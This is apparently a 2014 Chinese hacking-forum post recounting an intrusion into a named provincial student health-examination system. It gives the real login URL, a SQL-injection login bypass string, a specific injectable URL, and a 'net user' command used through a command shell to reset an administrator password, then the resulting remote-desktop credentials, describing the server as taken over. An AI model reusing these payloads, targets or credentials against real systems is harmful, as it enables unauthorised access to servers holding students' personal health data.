某省学生健康体检信息管理系统SQL注入导致服务器沦陷下载
-
来源:黑吧安全网 浏览:1211次 时间:2014-04-28
http://www.sdjktj.com/jktj/login.aspx
一个登陆页面
用户名 admin
密码用 ')or('a'='a 进行登陆 看图
注射点 http://www.sdjktj.com/jktj/Checksearch/Jkbgf.aspx?checkId=2456859
高权限的注射点
经过查看 3389端口是开放的
但是远程加用户貌似很困难 通过cmd shell 我改了一个正在登陆的用户的密码
命令如右边 net user administrator04 ad456dddd. 远程桌面计算机登陆 sdjktj.com
远程计算机 sdjktj.com
用户名 administrator04 密码:ad456dddd.
顺利登陆了 附带一个多站沦陷的图
下一篇: 今天百度贴吧的XSS漏洞下载